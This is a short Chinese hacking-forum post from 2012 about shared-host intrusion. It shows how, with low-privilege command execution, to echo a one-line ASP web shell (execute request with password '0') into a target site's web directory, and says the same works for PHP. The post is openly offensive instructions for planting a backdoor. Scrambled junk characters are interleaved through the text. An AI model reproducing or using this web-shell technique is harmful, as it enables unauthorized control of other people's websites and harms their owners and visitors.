在旁注过程中,可以执行cmd而权限又比较低的情况下,有时候可以用这个方法帮你拿下目标站。
1 g* Y# `2 r( b+ A) V% r2 Y' V; `6 }& U! P; p. |8 S4 L+ y
命令格式* Y9 g, f5 T7 o
) f% g) }! ?5 A; d3 C
Echo 语句 >目标站绝对目录
& v* w$ n3 |; s# r
+ ?4 ]5 \1 B/ @/ h; ^* x; q例如:
/ u6 E. U5 q, J! n& }- ~
4 `: H9 E( V$ E( cecho ^<^%execute request("0")%^> >D:\03389.com\wwwroot\YingMu.asp
; y+ e# V! h0 P4 [$ A# h7 g1 G2 P7 M3 m& e& z1 G2 P* T+ @5 w
这样访问目标站的目录下就会生成一个密码为0的asp的一句话,此方法在PHP等脚本语言均适用,大家灵活发挥。
; L5 T3 R- H. z& ] |
发表于 2012-9-23 14:40:24
收藏
支持
反对